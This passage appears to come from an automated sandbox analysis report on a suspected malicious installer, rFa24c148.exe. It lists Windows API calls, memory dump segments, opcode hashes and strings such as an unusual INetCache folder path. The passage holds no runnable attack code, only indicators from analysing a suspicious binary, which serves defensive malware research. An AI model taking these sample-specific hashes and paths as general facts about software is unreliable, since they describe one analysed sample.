                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: a4d713ec37b01fb01d6fe416f7f1015fc8604d13c1c7eace86c6fa01d5da54e1
                                                                                              • Instruction ID: 7e6010ae37c62f63916f0126c22991c2454b69940bf40bafb173ceb87b5e62a9
                                                                                              • Opcode Fuzzy Hash: a4d713ec37b01fb01d6fe416f7f1015fc8604d13c1c7eace86c6fa01d5da54e1
                                                                                              • Instruction Fuzzy Hash: 14C04C717443007AEA308B60AD45F2A7754A758701F5444697300B50D0C674E411D61D
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403E1D), ref: 00403FFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 68c7d3c3e0f7f1cab3b80b2c1a5527bcb09bd52aa90d361a41447b3617ec313a
                                                                                              • Instruction ID: 784fd17e5df65fd1e582592ff515389eb2153c2e002f91b2ba79ebddce7a884a
                                                                                              • Opcode Fuzzy Hash: 68c7d3c3e0f7f1cab3b80b2c1a5527bcb09bd52aa90d361a41447b3617ec313a
                                                                                              • Instruction Fuzzy Hash: D6B09235685201BAEA214B00ED09F957A62A768701F008464B300240B0C6B248A2DB09
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F30,?,?,?,?,00000000,00403425,?), ref: 004031C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                              • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                              • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                              • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403DB6), ref: 00403FE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 2acc807be0ba679717be6b01d9f42da513ad5f0c2234181876513f9ebcad2aad
                                                                                              • Instruction ID: b1b9a75aa143e31e8517bedffcdc50d49ca7046a294c6db3a10a508eb0cd57f7
                                                                                              • Opcode Fuzzy Hash: 2acc807be0ba679717be6b01d9f42da513ad5f0c2234181876513f9ebcad2aad
                                                                                              • Instruction Fuzzy Hash: 31A01132808000ABCA028B80EF08C0ABB22BBB0300B008838B208808308A320820EB0E
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 6917fec6ffc34fff1feb0dbf9c249be8de4da10d42883fba5183095b7f77083d
                                                                                              • Instruction ID: ca840a0cce859b8ae2bc82a563140a091be244092cc4fcaf6916384ea8909f5f
                                                                                              • Opcode Fuzzy Hash: 6917fec6ffc34fff1feb0dbf9c249be8de4da10d42883fba5183095b7f77083d
                                                                                              • Instruction Fuzzy Hash: E6D0C9B7B141409BDB54EBB8AE8989B73A8E7513297204C73D942F20A1D578D8028A3D
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049B5
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049C0
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A0A
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A1D
                                                                                              • SetWindowLongW.USER32(?,000000FC,00404F95), ref: 00404A36
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A4A
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5C
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A72
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A7E
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A90
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404A93
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ABE
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ACA
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B60
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B8B
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B9F
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BCE
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BDC
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BED
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CEA
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D4F
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D64
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D88
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DA8
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DBD
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DCD
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E46
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EEF
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404EFE
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1E
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F6C
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F77
                                                                                              • ShowWindow.USER32(00000000), ref: 00404F7E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: 0ffa46e9b13a572b6722491aa1927339d9f69ee42a2e2a1cbbe2628bd448c1d8
                                                                                              • Instruction ID: f03e607a396e187e7a88a72d0c11c4872557c7a4ae09ea9be525cead3dabdd13
                                                                                              • Opcode Fuzzy Hash: 0ffa46e9b13a572b6722491aa1927339d9f69ee42a2e2a1cbbe2628bd448c1d8
                                                                                              • Instruction Fuzzy Hash: A90294B0900209EFEB209F55DD45AAE7BB5FB84314F10817AF610B62E0C7799D52CF58
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 004044A6
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004044D0
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404581
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040458C
                                                                                              • lstrcmpiW.KERNEL32(Call,00422698,00000000,?,?), ref: 004045BE
                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004045CA
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045DC
                                                                                                • Part of subcall function 00405537: GetDlgItemTextW.USER32(?,?,00000400,00404613), ref: 0040554A
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rFa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 0040606E
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                                • Part of subcall function 0040600B: CharNextW.USER32(?,"C:\Users\user\Desktop\rFa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406082
                                                                                                • Part of subcall function 0040600B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406095
                                                                                              • GetDiskFreeSpaceW.KERNEL32(00420668,?,?,0000040F,?,00420668,00420668,?,00000000,00420668,?,?,000003FB,?), ref: 0040469D
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046B8
                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00420658), ref: 0040473E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                              • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer$Call
                                                                                              • API String ID: 2246997448-2961147510
                                                                                              • Opcode ID: f355fcafbdc44a253fd506062086f2951197c42d039416400d982413e2fc1c25
                                                                                              • Instruction ID: 0c6fa40730a198f5f3b00d197b033e886b1b3680f215deb67d5ef6a97ab5c625
                                                                                              • Opcode Fuzzy Hash: f355fcafbdc44a253fd506062086f2951197c42d039416400d982413e2fc1c25
                                                                                              • Instruction Fuzzy Hash: A79163B1900205BBDB11AFA1DC85AAF77B8EF85314F10847BF601B72D1D77C9A418B69
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                              Strings
                                                                                              • C:\Program Files (x86)\shaw, xrefs: 004020FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
